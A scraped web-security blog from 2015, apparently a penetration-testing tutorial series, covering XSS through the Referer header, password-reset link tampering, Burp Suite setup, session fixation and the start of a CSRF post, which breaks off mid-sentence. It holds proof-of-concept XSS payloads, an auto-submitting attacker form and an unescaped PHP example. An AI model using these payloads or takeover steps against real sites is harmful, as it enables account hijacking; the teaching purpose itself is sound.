<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVtgbWf9533MFgFChLww-AkcGUmGgCql9jXcWL6MAjFXxBCAiFYcRc4c7eqtN52qPbjzwqcCTNzdQgp8TqpSx80iCs2HqSXpCx8Fl2-rR37rwllDDfjyG4k_GinmOdHJox0ZFdYION8jZ-/s1600/IMG_20150609_081008%257E3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVtgbWf9533MFgFChLww-AkcGUmGgCql9jXcWL6MAjFXxBCAiFYcRc4c7eqtN52qPbjzwqcCTNzdQgp8TqpSx80iCs2HqSXpCx8Fl2-rR37rwllDDfjyG4k_GinmOdHJox0ZFdYION8jZ-/s1600/IMG_20150609_081008%257E3.jpg" /></a></div>
XSS in HTTP Headers attacks target the HTTP headers which are hidden from most users and may not be validated by web applications.<br />
<b>Background</b><br />
Suppose we have an application that generates a "Back" link from Referer header<br />
<br />
<?php echo '<a href="';<br />
echo $_SERVER['HTTP_REFERER'];<br />
echo '">Back</a>\n'; ?><br />
<br />
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in referer page back link . The payload Referer: javascript:prompt(xss); was submitted in the Referer HTTP header. This input was store on page back link when user click back link, xss will be triggered.<br />
<br />
<b>Testing</b><br />
We can inject HTML and JavaScript if we can set the Referer header. This can be done when the victim visit the attacker's page.<br />
Consider the following is in attacker's page<br />
<br />
<form id="test1" name="test1" method="GET" action="http://victimsite.com/main.php"> </form> <script> document.getElementById("test1").submit(); </script><br />
<br />
The victim is tricked to visit the attacker site http://attackersite.com/xss.php/"><script>alert(1);</script><br />
<br />
This will become the referral back link as it was redirected to victim website, and the xss payload is echoed as referred backlink on the victim site there by the xss payload triggered.</div>

XSS in Referrer Header

XSS in HTTP Headers attacks target the HTTP headers which are hidden from most users and may not be validated by web applications. Background Suppose we have an application that generates a "Back" li…

08 Jun 2015

Testing for Password Reset token validation

<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQqVxEnnBaHGz4b2wAW8JrNq3dk7K83Se8g59T8-pxhsJbIgpaZnWBnlkPlnRC3IVgko9HL5urGY1Pd0gOPAxa2DHB98WTkYjSxXTun66M_gFTtsjPA5r_scJZ9icIYsZOe7a0jxDED5aU/s1600/RESET-PASSWORD2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQqVxEnnBaHGz4b2wAW8JrNq3dk7K83Se8g59T8-pxhsJbIgpaZnWBnlkPlnRC3IVgko9HL5urGY1Pd0gOPAxa2DHB98WTkYjSxXTun66M_gFTtsjPA5r_scJZ9icIYsZOe7a0jxDED5aU/s1600/RESET-PASSWORD2.png" /></a></div>
<br />
Every Web application provides a mechanism to reset our account password.<br />
This generally prompts the user to enter his registered email address to get the password reset link.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIdvjZ3nKFBTnI709AHeLT_F_WiIb6awkkOIvcfFIlp6ANuDyWE3HJMa-Tl3PmTblp2MyHHLCmzc9PTo96lHNmqomMz7gZ7c2EUJwYnQhW0e3EvXFkFOydh3gZlqCyoNUYFD-gTG_KAOK8/s1600/Forgot+your+password-.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="115" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIdvjZ3nKFBTnI709AHeLT_F_WiIb6awkkOIvcfFIlp6ANuDyWE3HJMa-Tl3PmTblp2MyHHLCmzc9PTo96lHNmqomMz7gZ7c2EUJwYnQhW0e3EvXFkFOydh3gZlqCyoNUYFD-gTG_KAOK8/s320/Forgot+your+password-.png" width="320" /></a></div>
Whenever the user enters his registered email address immediately he'll get an email with password reset link from the web application.<br />
<br />
The following are the few ways to test this functionality of that web application,<br />
<br />
<div style="text-align: left;">
Test whether non registered users will also get a password reset links by requesting as a registered user.<br /></div>
<div style="text-align: left;">
Registered user gets the reset link, the link contains email. What happens when you change it with other registered email, and also with non registered email. </div>
<div style="text-align: left;">
<br />For Example alice has account in http://site.com and  requested password reset she'll get an email like <a href="http://site.com/password_reset?email=alice@gmail.com">http://site.com/password_reset?email=alice@gmail.com</a>. Now test the functionality of web application by entering another email in the above link.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
This is very old technique, now a days every one using random token along with the email address in the reset link. One example of such a reset link is </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYJgjManohATQBndPdfvTZN0-NoY6j1SkiaICwnDK-cCQ9m-gvMtpmS67thiBajaoYinoshSE8DIQLQyLue9EATyFN1S72aGtbzFO-PhnbqTCNdM2sUNk8ntHTPyJ-oUUOebeMWYQbxc0n/s1600/password+reset.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="58" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYJgjManohATQBndPdfvTZN0-NoY6j1SkiaICwnDK-cCQ9m-gvMtpmS67thiBajaoYinoshSE8DIQLQyLue9EATyFN1S72aGtbzFO-PhnbqTCNdM2sUNk8ntHTPyJ-oUUOebeMWYQbxc0n/s640/password+reset.JPG" width="640" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
In the above link test whether the email and token are associated or not. If they are not associated you can change the email with another email and can change the password.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
And latest web applications removed that email field from the reset link, you'll have only reset token.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyMME4n09WEZwlss0TRBPmK-n9GFLmyKzbyaIq9u34QvCQKjfi8xXeZ6pcocZ45wzVeAJBxDII_v-Hw7t2X1b_QQeKTanxRnVtkztA02K4eyKX43gBjb5sDvpNRWdWNDXgdNuzsszppuE8/s1600/password+reset1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="24" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyMME4n09WEZwlss0TRBPmK-n9GFLmyKzbyaIq9u34QvCQKjfi8xXeZ6pcocZ45wzVeAJBxDII_v-Hw7t2X1b_QQeKTanxRnVtkztA02K4eyKX43gBjb5sDvpNRWdWNDXgdNuzsszppuE8/s640/password+reset1.JPG" width="640" /></a></div>
<div style="text-align: left;">
<br /></div>
</div>

Testing for Password Reset token validation

Every Web application provides a mechanism to reset our account password. This generally prompts the user to enter his registered email address to get the password reset link. Whenever the user enter…

05 Jun 2015

Burp Suite tutorial

<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: inherit;"><b>Burp suite</b> or <b>Burp proxy</b> is a web application proxy tool which is very useful for testing web applications. It contains numerous tools like proxy,spider,scanner, intruder, repeater, sequencer, decoder, comparer, extender to attack web applications.</span><br />
<span style="color: #333333;"><span style="font-size: 14px;"><br /></span></span>
<span style="color: #333333;"><span style="font-size: 14px;">The Burp Suite tools description:</span></span><br />
<span style="color: #333333;"><span style="font-size: 14px;"><br /></span></span>
<span style="color: #333333;"><span style="font-size: 14px;">Proxy: Burp Proxy is an interactive HTTP/S proxy server for attacking and testing web applications. It operates as a man-in-the-middle between the end browser and the target web server, and allows the user to intercept, inspect and modify the raw traffic passing in both directions.</span></span><br />
<span style="color: #333333;"><span style="font-size: 14px;"><br /></span></span>
<span style="color: #333333;"><span style="font-size: 14px;">Spider: Burp Spider is a tool for mapping web applications. It uses various intelligent techniques to generate a comprehensive inventory of an application’s content and functionality.</span></span><br />
<span style="color: #333333;"><span style="font-size: 14px;"><br /></span></span>
<span style="color: #333333;"><span style="font-size: 14px;">Scanner: Burp Scanner is a tool for performing automated discovery of security vulnerabilities in web applications. It is designed to be used by penetration testers, and to fit in closely with your existing techniques and methodologies for performing manual and semi-automated penetration tests of web applications.</span></span><br />
<span style="color: #333333;"><span style="font-size: 14px;"><br /></span></span>
<span style="color: #333333;"><span style="font-size: 14px;">Intruder: Burp Intruder is a tool for automating customized attacks against web applications.</span></span><br />
<span style="color: #333333;"><span style="font-size: 14px;"><br /></span></span>
<span style="color: #333333;"><span style="font-size: 14px;">Repeater: Burp Repeater is a tool for manually modifying and reissuing individual HTTP requests, and analyzing their responses. It is best used in conjunction with the other Burp Suite tools. For example, you can send a request to Repeater from the target site map, from the Burp Proxy browsing history, or from the results of a Burp Intruder attack, and manually adjust the request to fine-tune an attack or probe for vulnerabilities.</span></span><br />
<span style="color: #333333;"><span style="font-size: 14px;"><br /></span></span>
<span style="color: #333333;"><span style="font-size: 14px;">Sequencer: Burp Sequencer is a tool for analyzing the degree of randomness in an application’s session tokens or other items on whose unpredictability the application depends for its security.</span></span><br />
<span style="color: #333333;"><span style="font-size: 14px;"><br /></span></span>
<span style="color: #333333;"><span style="font-size: 14px;">Decoder: Burp Decoder is a simple tool for transforming encoded data into its canonical form, or for transforming raw data into various encoded and hashed forms. It is capable of intelligently recognizing several encoding formats using heuristic techniques.</span></span><br />
<span style="color: #333333;"><span style="font-size: 14px;"><br /></span></span>
<br />
<span style="color: #333333;"><span style="font-size: 14px;">Comparer: Burp Comparer is a simple tool for performing a comparison (a visual “diff”) between any two items of data. In the context of attacking a web application, this requirement will typically arise when you want to quickly identify the differences between two application responses (for example, between two responses received in the course of a Burp Intruder attack, or between responses to a failed login using valid and invalid usernames), or between two application requests (for example, to identify the different request parameters that give rise to different behaviour).</span></span><br />
<span style="color: #333333;"><span style="font-size: 14px;"><br /></span></span>
<br />
<div>
<div>
<b>Enabling the Burp Suite Proxy</b></div>
<div>
<br /></div>
<div>
To begin using the Burp Suite we need configure our web browser to use the Burp Suite as a proxy. The Burp Suite proxy will use port 8080 by default but you can change this if you want to.</div>
<div>
<br /></div>
<div>
You need to configure your browser settings to use burp proxy.</div>
<div>
<br /></div>
<div style="text-align: left;">
<strong style="background-color: white; color: #404042; font-family: Arial, sans-serif; font-size: 14px; line-height: 17px;">Firefox:</strong><span style="background-color: white; color: #404042; font-family: Arial, sans-serif; font-size: 14px; line-height: 17px;"> </span></div>
</div>
<div style="text-align: left;">
<span style="background-color: white; color: #404042; font-family: Arial, sans-serif; font-size: 14px; line-height: 17px;">Go to the Firefox menu, click on Options, click on Advanced, go to the Network tab, and click on the Settings button in the Connection section.</span></div>
<div style="text-align: left;">
<span style="background-color: white; color: #404042; font-family: Arial, sans-serif; font-size: 14px; line-height: 17px;">Select the "Manual proxy configuration" radio button. Enter your Burp Proxy listener address in the "HTTP proxy" field (by default, 127.0.0.1). Enter your Burp Proxy listener port in the "Port" field (by default, 8080). Make sure the "Use this proxy server for all protocols" box is checked. Delete anything that appears in the "No proxy for" field. Then click "OK" to close all of the options dialogs.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgls2AK1-IfP-2TaVq2qxaD92W9YbJOM-XKLLXdOqnk0mxUmzPbpFbVbn1i18CYsp0DD1Tgf2i_EZ1U8_rpBjea7QkyAdoY9QphUj7Y63wFnnZcceUqFgl-Hz4oKKKiIz-u6i55a5xJg_1k/s1600/firefox+settings1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="169" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgls2AK1-IfP-2TaVq2qxaD92W9YbJOM-XKLLXdOqnk0mxUmzPbpFbVbn1i18CYsp0DD1Tgf2i_EZ1U8_rpBjea7QkyAdoY9QphUj7Y63wFnnZcceUqFgl-Hz4oKKKiIz-u6i55a5xJg_1k/s320/firefox+settings1.JPG" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq3YcZqdGynGQjFOUzhadhKe4lFxXvdu4XWSfMtiGAmySefVq30VSpS2LfRH9SM6O7-JLJnL21iKZTqcFD9Z0iNm_gOTeUkxKYuDdJDP2Nc_gRWtOH9tz-pDsuGsG3fOepSkCx6kRHqMNY/s1600/firefox+settings2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq3YcZqdGynGQjFOUzhadhKe4lFxXvdu4XWSfMtiGAmySefVq30VSpS2LfRH9SM6O7-JLJnL21iKZTqcFD9Z0iNm_gOTeUkxKYuDdJDP2Nc_gRWtOH9tz-pDsuGsG3fOepSkCx6kRHqMNY/s320/firefox+settings2.JPG" width="262" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Note: </b>To connect to HTTPS sites you need to install burp CA certificate. </div>
<div class="separator" style="clear: both; text-align: left;">
Installation steps:</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ol style="text-align: left;">
<li>Go to http://127.0.0.1:8080</li>
<li>Click on CA Certificate and save to local drive<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinlINu9daSIkoH_YdtGQ5-HnvlTn-3pD3yyloxO43p9lH536Qw6-EmSlb85GgLHSBu05pn1hiSKzA4_gxg-oKV7YKvX6tvGeJ5bQeUBvpI6qs1YWYOBA5e-6zS_I5I4HeV5f4Vtq-_86fN/s1600/burp1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinlINu9daSIkoH_YdtGQ5-HnvlTn-3pD3yyloxO43p9lH536Qw6-EmSlb85GgLHSBu05pn1hiSKzA4_gxg-oKV7YKvX6tvGeJ5bQeUBvpI6qs1YWYOBA5e-6zS_I5I4HeV5f4Vtq-_86fN/s320/burp1.JPG" width="320" /></a></div>
</li>
<li>Now go to firefox Options<span style="color: #333333; font-family: Verdana, Geneva, Tahoma, Arial, Helvetica, sans-serif;"><span style="font-size: 15px; line-height: 21.4285717010498px;">→Advanced→Certificates→View Certificates.<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhPMnbWgGDUMxebyLnkR-pSRrvTYnEOlKWKEl6NdusNaC6_CcXabqsdGX2F5TvbD9bs1C6_3ZyJUEsJRjye-c4jGhUNlku4DguOp1rjn0wEkZGrF2xS9aRiI7atnN9_A_GjgKTrYPp4lE7/s1600/firefox+settings3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhPMnbWgGDUMxebyLnkR-pSRrvTYnEOlKWKEl6NdusNaC6_CcXabqsdGX2F5TvbD9bs1C6_3ZyJUEsJRjye-c4jGhUNlku4DguOp1rjn0wEkZGrF2xS9aRiI7atnN9_A_GjgKTrYPp4lE7/s320/firefox+settings3.JPG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
</span></span></li>
<li><div class="separator" style="clear: both; text-align: left;">
Click on Import→select Burp CA Certificate→check Trust this CA to identify websites.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYRPAG5M09FhoYYA_61HRZWeN4Av33DEuYGvmLYBOtCE1Z-jm0Ans9j9aBrVl8dhekh8Ibx_zmmmGeMvDOY6Ar2qiuzmD68hUrKE5u_tbIU-FUz7OGURfACswf2tL58ZkJEeP_Dvz1Lz7B/s1600/firefox+settings4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYRPAG5M09FhoYYA_61HRZWeN4Av33DEuYGvmLYBOtCE1Z-jm0Ans9j9aBrVl8dhekh8Ibx_zmmmGeMvDOY6Ar2qiuzmD68hUrKE5u_tbIU-FUz7OGURfACswf2tL58ZkJEeP_Dvz1Lz7B/s320/firefox+settings4.JPG" width="320" /></a></div>
</li>
<li><div class="separator" style="clear: both; text-align: left;">
Click OK to finish.</div>
</li>
</ol>
<br />
<div style="text-align: left;">
<span style="background-color: white; color: #404042; font-family: Arial, sans-serif; font-size: 14px; line-height: 17px;"><br /></span></div>
</div>

Burp Suite tutorial

Burp suite or Burp proxy is a web application proxy tool which is very useful for testing web applications. It contains numerous tools like proxy,spider,scanner, intruder, repeater, sequencer, decode…

04 Jun 2015

Session fixation Attack

<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="background-color: white; color: #252525; font-size: 14px; line-height: 22.3999996185303px; margin-bottom: 0.5em; margin-top: 0.5em;">
<span style="font-family: inherit;"><b>Session Fixation</b> is an attack that allows an attacker to takeover a valid user session. When authenticating a user, it doesn’t assign a new session ID, and use an existent session ID. The attack consists of obtaining a valid session ID (e.g. by connecting to the application), inducing a user to authenticate himself with that session ID, and then hijacking the user-validated session by the knowledge of the used session ID. The attacker has to provide a legitimate Web application session ID and try to make the victim's browser use it.</span></div>
<div style="background-color: white; color: #252525; font-size: 14px; line-height: 22.3999996185303px; margin-bottom: 0.5em; margin-top: 0.5em;">
<span style="font-family: inherit;">In session fixation the attacker steals the established session between the victim and the Web Server after the victim logs in. Instead, the Session Fixation attack fixes an established session on the victim's browser, so the attack starts before the user logs in.</span></div>
<div style="background-color: white; color: #252525; font-size: 14px; line-height: 22.3999996185303px; margin-bottom: 0.5em; margin-top: 0.5em;">
<span style="font-family: inherit;">Execution of this attack generally depends on how the Web application deals with session IDs. Below are some of the most common techniques used to deal with session IDs:</span></div>
<div style="background-color: white; color: #252525; font-size: 14px; line-height: 22.3999996185303px; margin-bottom: 0.5em; margin-top: 0.5em; text-align: left;">
</div>
<ul>
<li><span style="font-family: inherit;"><b style="line-height: 22.3999996185303px;">Session ID in the URL:</b><span style="line-height: 22.3999996185303px;"> The Session ID is sent to the victim in a hyperlink and the victim accesses the site through the malicious URL. e.g http://site.com/login?sesseionid=12345</span></span></li>
<li><span style="font-family: inherit;"><b style="line-height: 22.3999996185303px;">Session ID in a hidden form field:</b><span style="line-height: 22.3999996185303px;"> In this method, the victim must be tricked to authenticate in the target Web Server, using a login form developed for the attacker. The form could be hosted in the evil web server.</span></span></li>
<li><b style="line-height: 22.3999996185303px;"><span style="font-family: inherit;">Session ID in a cookie:</span></b></li>
<br />
<div style="background-color: white; color: #252525; font-size: 14px; line-height: 22.3999996185303px; margin-bottom: 0.5em; margin-top: 0.5em; text-align: left;">
</div>
<ol style="text-align: left;">
<li><span style="font-family: inherit; line-height: 22.3999996185303px;"><i>Client-side script</i> </span>
<span style="font-family: inherit; line-height: 22.3999996185303px;">Most browsers support the execution of client-side scripting. In this case, the aggressor could use attacks of code injection as the </span><a href="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" style="background: none; color: #0b0080; font-family: inherit; line-height: 22.3999996185303px; text-decoration: none;" title="Cross-site Scripting (XSS)">XSS</a><span style="font-family: inherit; line-height: 22.3999996185303px;"> (Cross-site scripting) attack to insert a malicious code in the hyperlink sent to the victim and fix a Session ID in its cookie. Using the function document.cookie, the browser which executes the command becomes capable of fixing values inside of the cookie that it will use to keep a session between the client and the Web Application.</span></li>
<li><span style="font-family: inherit; line-height: 22.3999996185303px;"><i><META> tag</i></span>
<span style="font-family: inherit; line-height: 22.3999996185303px;"><META> tag also is considered a code injection attack, however, different from the XSS attack where undesirable scripts can be disabled, or the execution can be denied. The attack using this method becomes much more efficient because it's impossible to disable the processing of these tags in the browsers.</span></li>
<li><span style="font-family: inherit; line-height: 22.3999996185303px;"><i>HTTP header response</i></span>
<span style="font-family: inherit; line-height: 22.3999996185303px;">This method explores the server response to fix the Session ID in the victim's browser. Including the parameter Set-Cookie in the HTTP header response, the attacker is able to insert the value of Session ID in the cookie and sends it to the victim's browser.</span></li>
</ol>
</ul>
<div>
<span style="line-height: 22.3999996185303px;"><b>Exploiting Session Fixation:</b></span></div>
<div style="background-color: white; color: #252525; font-size: 14px; line-height: 22.3999996185303px; margin-bottom: 0.5em; margin-top: 0.5em;">
<span style="font-family: inherit;">This is a simple example of session fixation attack</span></div>
<div>
<ol style="text-align: left;">
<li><span style="background-color: white; color: #252525; font-family: inherit; font-size: 14px; line-height: 22.3999996185303px;">The attacker has to establish a legitimate connection with the web server which issues a session ID </span></li>
<li><span style="background-color: white; color: #252525; font-family: inherit; font-size: 14px; line-height: 22.3999996185303px;">Then the attacker has to send a link with the established session ID to the victim, </span></li>
<li><span style="background-color: white; color: #252525; font-family: inherit; font-size: 14px; line-height: 22.3999996185303px;">Victim has to click on the link sent from the attacker accessing the site, the Web Server saw that session was already established and a new one need not to be created.</span></li>
<li><span style="background-color: white; color: #252525; font-family: inherit; font-size: 14px; line-height: 22.3999996185303px;">The victim provides his credentials to the Web Server knowing the session ID</span></li>
<li><span style="background-color: white; color: #252525; font-family: inherit; font-size: 14px; line-height: 22.3999996185303px;">Now the attacker can access the victim account by replaying the same session ID for which the victim authenticated.</span></li>
</ol>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHPNptk5sqEFP3SCo7d087mYF6i0ciSu4v8Qv3SNk44-ewSFxcqpeRP_bgdbrf7KxcTLarjDbVdKitpHTgN8XKwNCNJkCDVOxGGk_vQFABgNM7JXE0BSIQmmk5GxAQ2JhzuD4oOdb2RKoQ/s1600/session+fixation.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHPNptk5sqEFP3SCo7d087mYF6i0ciSu4v8Qv3SNk44-ewSFxcqpeRP_bgdbrf7KxcTLarjDbVdKitpHTgN8XKwNCNJkCDVOxGGk_vQFABgNM7JXE0BSIQmmk5GxAQ2JhzuD4oOdb2RKoQ/s320/session+fixation.JPG" width="320" /></a></div>
<div style="background-color: white; color: #252525; font-size: 14px; line-height: 22.3999996185303px; margin-bottom: 0.5em; margin-top: 0.5em;">
<span style="font-family: inherit;"><b>Testing for Session Fixation vulnerabilities:</b><br />The first step is to make a request to the site to be tested (example www.example.com). If the tester requests the following:</span></div>
<pre style="background-color: #f9f9f9; border: 1px solid rgb(221, 221, 221); font-size: 14px; line-height: 1.3em; padding: 1em;"><span style="font-family: inherit;">GET www.example.com
</span></pre>
<div style="background-color: white; color: #252525; font-size: 14px; line-height: 22.3999996185303px; margin-bottom: 0.5em; margin-top: 0.5em;">
<span style="font-family: inherit;">They will obtain the following answer:</span></div>
<pre style="background-color: #f9f9f9; border: 1px solid rgb(221, 221, 221); font-size: 14px; line-height: 1.3em; padding: 1em;"><span style="font-family: inherit;">HTTP/1.1 200 OK
Date: Wed, 14 Aug 2008 08:45:11 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000d8eyYq3L0z2fgq10m4v-rt4:-1; Path=/; secure
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=Cp1254
Content-Language: en-US
</span></pre>
<div style="background-color: white; color: #252525; font-size: 14px; line-height: 22.3999996185303px; margin-bottom: 0.5em; margin-top: 0.5em;">
<span style="font-family: inherit;"><br />The application sets a new session identifier JSESSIONID=0000d8eyYq3L0z2fgq10m4v-rt4:-1 for the client.</span></div>
<div style="background-color: white; color: #252525; font-size: 14px; line-height: 22.3999996185303px; margin-bottom: 0.5em; margin-top: 0.5em;">
<span style="font-family: inherit;"><br />Next, if the tester successfully authenticates to the application with the following POST HTTPS:</span></div>
<pre style="background-color: #f9f9f9; border: 1px solid rgb(221, 221, 221); font-size: 14px; line-height: 1.3em; padding: 1em;"><span style="font-family: inherit;">POST https://www.example.com/authentication.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.example.com
Cookie: JSESSIONID=0000d8eyYq3L0z2fgq10m4v-rt4:-1
Content-Type: application/x-www-form-urlencoded
Content-length: 57

Name=Meucci&wpPassword=secret!&wpLoginattempt=Log+in
</span></pre>
<div style="background-color: white; color: #252525; font-size: 14px; line-height: 22.3999996185303px; margin-bottom: 0.5em; margin-top: 0.5em;">
<span style="font-family: inherit;"><br />The tester observes the following response from the server:</span></div>
<pre style="background-color: #f9f9f9; border: 1px solid rgb(221, 221, 221); font-size: 14px; line-height: 1.3em; padding: 1em;"><span style="font-family: inherit;">HTTP/1.1 200 OK
Date: Thu, 14 Aug 2008 14:52:58 GMT
Server: Apache/2.2.2 (Fedora)
X-Powered-By: PHP/5.1.6
Content-language: en
Cache-Control: private, must-revalidate, max-age=0
X-Content-Encoding: gzip
Content-length: 4090
Connection: close
Content-Type: text/html; charset=UTF-8
...
HTML data
...
</span></pre>
<div style="background-color: white; color: #252525; font-size: 14px; line-height: 22.3999996185303px; margin-bottom: 0.5em; margin-top: 0.5em;">
<span style="font-family: inherit;"><br />As no new cookie has been issued upon a successful authentication the tester knows that it is possible to perform session hijacking.</span></div>
</div>
</div>

Session fixation Attack

Session Fixation is an attack that allows an attacker to takeover a valid user session. When authenticating a user, it doesn’t assign a new session ID, and use an existent session ID. The attack cons…

04 Jun 2015

Cross Site Request Forgery

<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="color: #555555; font-family: Gotham SSm A, Gotham SSm B, Helvetica, Arial, sans-serif;"><span style="font-size: 14px; line-height: 18.2000007629395px;"><b><br /></b></span></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif9LjwnOumWHx-M4Zs49UlLGpcnyCRJ_exjsrhm4fWxHR6l-veLEN7_yF_P8WX93wIwCzbrXAIKpjRt-rAmtDimISiz2_8ICAMVTPSBs-pTXG1g1d4pCGzDIfkznruzcOtgh1ebcW1iMcO/s1600/xss-and-csrf.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif9LjwnOumWHx-M4Zs49UlLGpcnyCRJ_exjsrhm4fWxHR6l-veLEN7_yF_P8WX93wIwCzbrXAIKpjRt-rAmtDimISiz2_8ICAMVTPSBs-pTXG1g1d4pCGzDIfkznruzcOtgh1ebcW1iMcO/s1600/xss-and-csrf.jpg" /></a></div>
<span style="color: #555555; font-family: Gotham SSm A, Gotham SSm B, Helvetica, Arial, sans-serif;"><span style="font-size: 14px; line-height: 18.2000007629395px;"><b>Cross-Site Request Forgery (CSRF) </b>is an attack where an attacker sends requests from malicious website to a target web application that a user is already authenticated. This way an attacker can access functionality in a target web application via the victim's already authenticated browser. Targets include web applications like social media, in-browser email clients, online banking and web interfaces for network devices.</span></span><br />
<br />
<ul style="text-align: left;">
<li><span style="color: #555555; font-family: 'Gotham SSm A', 'Gotham SSm B', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18.2000007629395px;">Malicious requests are sent from a site that a user visits to another site that the attacker believes the victim is validated against.</span></li>
<li><span style="color: #555555; font-family: 'Gotham SSm A', 'Gotham SSm B', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18.2000007629395px;">The malicious requests are routed to the target site via the victim’s browser, which is authenticated by the victim against the target site.</span></li>
<li><span style="color: #555555; font-family: 'Gotham SSm A', 'Gotham SSm B', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18.2000007629395px;">The vulnerability lies in the web application, not the victim’s browser.</span></li>
</ul>
<br />
<span style="color: #555555; font-family: Gotham SSm A, Gotham SSm B, Helvetica, Arial, sans-serif;"><span style="font-size: 14px; line-height: 18.2000007629395px;"><b>Executing a CSRF Attack</b></span></span><br />
<span style="color: #555555; font-family: Gotham SSm A, Gotham SSm B, Helvetica, Arial, sans-serif;"><span style="font-size: 14px; line-height: 18.2000007629395px;">In a Cross-Site Request Forgery attack, the victim must be authenticated against (logged into) the target site(web application). For instance, let’s say www.abcdbank.com has online banking that is vulnerable to CSRF. If I visit a page containing a CSRF attack on www.abcdbank.com but am not currently logged in, nothing happens. If I am logged in, however, the requests in the attack will be executed as if they were actions that I had intended to take.</span></span><br />
<span style="color: #555555; font-family: Gotham SSm A, Gotham SSm B, Helvetica, Arial, sans-serif;"><span style="font-size: 14px; line-height: 18.2000007629395px;"><br /></span></span>
<span style="color: #555555; font-family: Gotham SSm A, Gotham SSm B, Helvetica, Arial, sans-serif;"><span style="font-size: 14px; line-height: 18.2000007629395px;">Let’s look at how the attack described above would work in a bit more detail. </span></span><br />
<span style="color: #555555; font-family: Gotham SSm A, Gotham SSm B, Helvetica, Arial, sans-serif;"><span style="font-size: 14px; line-height: 18.2000007629395px;"><br /></span></span>
<br />
<span style="color: #555555; font-family: 'Gotham SSm A', 'Gotham SSm B', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18.2000007629395px;">First, let’s assume that I’m logged into my account on www.abcdbank.com, which allows for online banking features such as transferring funds to another account.</span><br />
<div style="text-align: left;">
